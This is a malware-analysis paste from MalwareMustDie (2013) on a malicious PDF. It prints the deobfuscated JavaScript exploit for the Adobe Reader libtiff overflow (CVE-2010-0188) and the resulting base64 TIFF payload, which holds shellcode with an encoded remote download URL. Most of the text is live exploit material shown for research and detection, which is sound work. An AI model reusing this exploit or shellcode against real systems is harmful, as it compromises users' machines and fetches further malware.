daily pastebin goal
20%
SHARE
TWEET

#MalwareMustDie - Suspected PDF 0day Analysis (FIN)

MalwareMustDie Jan 24th, 2013 (edited) 2,896 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #MalwareMustDie
  2.  
  3. //Source of infection URL & Download PoC:
  4.  
  5. --2013-01-24 13:10:15--  h00p://hzebw.portrelay.com/jentrate.php
  6. Resolving hzebw.portrelay.com... seconds 0.00, 78.110.63.106
  7. Caching hzebw.portrelay.com => 78.110.63.106
  8. Connecting to hzebw.portrelay.com|78.110.63.106|:80... seconds 0.00, connected.
  9.    :
  10. ---request end---
  11. HTTP request sent, awaiting response...
  12. HTTP/1.1 200 OK
  13. Server: nginx/1.2.3
  14. Date: Thu, 24 Jan 2013 04:10:12 GMT
  15. Content-Type: application/pdf
  16. Content-Length: 5633
  17. X-Powered-By: PHP/5.3.17
  18. Content-Disposition: inline; filename=test.pdf
  19.  
  20. ---response end---
  21. 200 OK
  22. Registered socket 1896 for persistent reuse.
  23. Length: 5633 (5.5K) [application/pdf]
  24. Saving to: `jentrate.php'
  25.  
  26.  
  27. // PDF downloaded report:
  28. https://www.virustotal.com/file/c7236e6776fd06a60d26b37801e6dd7dfc11b53f9ee18504448af5c08c63f926/analysis/ (7/46)
  29.  
  30. // Automation crack reference: jsunpack:
  31. http://jsunpack.jeek.org/?report=516115790568fd46e1f72c952074a64755947796
  32. //wepawet:
  33. http://wepawet.iseclab.org/view.php?hash=7aa672bc48698a62dceb83daa97cd1e4&type=js&t=1359040097
  34.  
  35. WHAT'S THIS? Many suspected this as 0day PDF.
  36. I was attempted to analyze the exploitation of this PDF, below is the report of decoding
  37. which automation couldn't go further. Following by the Exploitation detaiil used +
  38. The exploit kit info used.
  39.  
  40. The first one who detected this issue ws @Donovan
  41. Also pecial thanks to all from participant engineers at #InfoSec group: @bartblaze @nsmfoo @StopMalvertisin @undeadsecurity @essachin @it4sec @EricOpdyke
  42.  
  43. // changed the script as per follows...........
  44. //
  45. edlejemod = "6xe5HAMAAIs0JIn3VoA+XnQGrDS8quL6w+jk////4jHKqFTmvby8Bci/vLw1e08YQ1wxDLS/vLxU+L28vCsxI7y5vLzWtuHxszgsvLy86utU1728vNQ8vry87+tUhL28vDl8yL5XXNTdPWVzVA6+vLxDbIC6wKRUz728vIG8nLy8wbDvVBG8vLw5fMmiVwTvVNi8vLw5fMmujXzYN/ykN/yIgVi+vLzIZlcg6zVL1kPljXxAThIr4zyEvMi/Klc464181kPlQE7aE3v7Qoe8jbzj1Dy+vLzv61QHvLy81E5nyBFUO728vNQk0/OB7FQKvby81rzWQkNs6TVZ1ujllXDcMcCYnOuNfE8W4zHLrNb4M7qNZ9Q0Qg+qVLi+vLzr6u/v7+/v7+9DybRDbDX4mKDddX64vOk1WdaA5ZVw6zHAmLjt6418TxbjM7vWz9TSvN281M68ybw127BDybQz+6zURsYpWFS4vby81GFkkkDsVI+9vLzrQ2w/eLDjdX64vNTodhMtVCS9vLzW/NS8rLy81r3WvENsf+k1WVTkvby81NlT87nsVEG8vLyNde3tQ8msQ8mwQ8m07UNsdX6wvOk1WdROZ8gRVB68vLzUwvY/a+xUbby8vNa81Jm877wxsJhDybDtQ8m0Q2x1frS86TVZPVC0vry83I1n1MtXt51U1ry8vCrUsxui5epUJLy8vDHxQO3WtNZDQ2wtX/bU5tJnZ+pUPLy8vDHxRDEBREFDQ+3UvL68vOvWpUPJQENsLV+Z1HEwy03qVOe8vLxDi0Nsswq09dSOwrqc6lT0vLy87UOLQ2w3pDXgmKDddX/cjXzYN+yMN+6wN+6oN86UjUONfBD6OXzIsYDdwL6QnH1zsb17V1eHwJiYN/6sN67JZzX4mKDdfri83DfQmJg3+YA36LnEvVY39qQ35py9V1+I9TeIN71SjUONfEAQOHzIu31zsb17V0iHwJiUyV035pi9V9o3sPc35qC9Vze4N71UNfiYoN1+tLzU09K8vNTJztDR6FS/vLy85eV/1DLyslDUq3aX0lToQ0ND7FQ0Q0NDQ1zUq3aX0lT+Q0NDQ8iYuOxUzkNDQ364vGh0dHA6Ly83OC4xMTAuNjAuOTkvL29sZWdkZW15LnBocD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
  46.  
  47. function tblefdr(o, k){   // blah..
  48.  while (o.length < k){
  49.    o += o
  50.  }
  51.  return o.substring(0, k)
  52. }
  53.  
  54. fkyhifxmy(); //<== the main
  55.            
  56. function fkyhifxmy(){       // PoC of Libtiff integer overflow in Adobe Reader and
  57.                            // Acrobat CVE-2010-0188 is detected here see the strings..
  58.  
  59.  hboxwhkju = "o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAABReASiBWhEoPY4BKo+uASjAggkqvWIBKXVyASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQQUXgEpqaVmNEE2BSgUXgEp0JASNMFOBSgUXgEpBQUFBeAzzpEtTgUoCF4BKQUFBQTHJZItxMIt2DIt2HItuCItGIIs2ZjlIGHXyi0U8i1QFeAHqi3IgAe4xyUGtAeiLGCtYBIH75SDd/3XvSYtaJAHrZosMS4taHAHrAyyLieZqBP82/9WFwK119YE4SUkqAHXtljHJtQPzpQ==";
  60.  neeynlkdi = "kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAApWOASiAJikqWIYBKkB+ASjCQhErYp4BKjauASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQaVjgEpqaVmNM7WASqVjgEp0JASNT0uCSqVjgEp4DPOkIg6CSqJjgEpBQUFBMclki3Ewi3YMi3Yci24Ii0YgizZmOUgYdfKLRTyLVAV4AeqLciAB7jHJQa0B6IsYK1gEgfvlIN3/de9Ji1okAetmiwxLi1ocAesDLIuJ5moE/zb/1YXArXX1gThJSSoAde2WMcm1A/Ol";
  61.  lfwfnldsc = "SUkqADggAACQ";
  62.  eosjddjas = "kJCQ";
  63.  vbnqhwdkk = "kAcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////";
  64.    function rvcorgs(){
  65.    // mm = app.viewerVersion.toString(); // bypass this mm bullshit...
  66.    // mm = mm.replace(".", "");
  67.    // while (mm.length < 4){
  68.    //  mm += 0
  69.    //}
  70.    mm = 9000;   // changed the mm to value bigger than 8000 ( the exploit target version)
  71.    ll = 10;
  72.    return parseInt(mm, ll)
  73.  }
  74.  pxhnxcedi = rvcorgs();            // suspected logic/parts..
  75.  if (pxhnxcedi >= 8000){          // this number means Adobe ver 8.0.0.0
  76.    gjoegkdqt = lfwfnldsc;
  77.    gjoegkdqt += tblefdr(eosjddjas, 2000);
  78.    gjoegkdqt += edlejemod;                   // while feeding obfs data...
  79.    gjoegkdqt += tblefdr(eosjddjas, 7736);
  80.    gjoegkdqt += vbnqhwdkk;
  81.    gjoegkdqt += (pxhnxcedi < 8201 ? hboxwhkju : neeynlkdi); //ver 8.2.0.1
  82.    //esrmhkwko.rawValue = gjoegkdqt  // skip this lousy part.. it just called the
  83.                                      //var form in PDF for feeding output values..
  84.    document.write(gjoegkdqt);   // <--- change to this to burp value resulted...
  85.  }     // be noted variable esrmhkwko <-- key of exploitation
  86.  return  
  87. }
  88.  
  89. //==================BURP RESULT==============================
  90.  
  91. //
  92.  
  93. SUkqADggAACQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ6xe5HAMAAIs0JIn3VoA+XnQGrDS8quL6w+jk////4jHKqFTmvby8Bci/vLw1e08YQ1wxDLS/vLxU+L28vCsxI7y5vLzWtuHxszgsvLy86utU1728vNQ8vry87+tUhL28vDl8yL5XXNTdPWVzVA6+vLxDbIC6wKRUz728vIG8nLy8wbDvVBG8vLw5fMmiVwTvVNi8vLw5fMmujXzYN/ykN/yIgVi+vLzIZlcg6zVL1kPljXxAThIr4zyEvMi/Klc464181kPlQE7aE3v7Qoe8jbzj1Dy+vLzv61QHvLy81E5nyBFUO728vNQk0/OB7FQKvby81rzWQkNs6TVZ1ujllXDcMcCYnOuNfE8W4zHLrNb4M7qNZ9Q0Qg+qVLi+vLzr6u/v7+/v7+9DybRDbDX4mKDddX64vOk1WdaA5ZVw6zHAmLjt6418TxbjM7vWz9TSvN281M68ybw127BDybQz+6zURsYpWFS4vby81GFkkkDsVI+9vLzrQ2w/eLDjdX64vNTodhMtVCS9vLzW/NS8rLy81r3WvENsf+k1WVTkvby81NlT87nsVEG8vLyNde3tQ8msQ8mwQ8m07UNsdX6wvOk1WdROZ8gRVB68vLzUwvY/a+xUbby8vNa81Jm877wxsJhDybDtQ8m0Q2x1frS86TVZPVC0vry83I1n1MtXt51U1ry8vCrUsxui5epUJLy8vDHxQO3WtNZDQ2wtX/bU5tJnZ+pUPLy8vDHxRDEBREFDQ+3UvL68vOvWpUPJQENsLV+Z1HEwy03qVOe8vLxDi0Nsswq09dSOwrqc6lT0vLy87UOLQ2w3pDXgmKDddX/cjXzYN+yMN+6wN+6oN86UjUONfBD6OXzIsYDdwL6QnH1zsb17V1eHwJiYN/6sN67JZzX4mKDdfri83DfQmJg3+YA36LnEvVY39qQ35py9V1+I9TeIN71SjUONfEAQOHzIu31zsb17V0iHwJiUyV035pi9V9o3sPc35qC9Vze4N71UNfiYoN1+tLzU09K8vNTJztDR6FS/vLy85eV/1DLyslDUq3aX0lToQ0ND7FQ0Q0NDQ1zUq3aX0lT+Q0NDQ8iYuOxUzkNDQ364vGh0dHA6Ly83OC4xMTAuNjAuOTkvL29sZWdkZW15LnBocD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkAcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAApWOASiAJikqWIYBKkB+ASjCQhErYp4BKjauASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQaVjgEpqaVmNM7WASqVjgEp0JASNT0uCSqVjgEp4DPOkI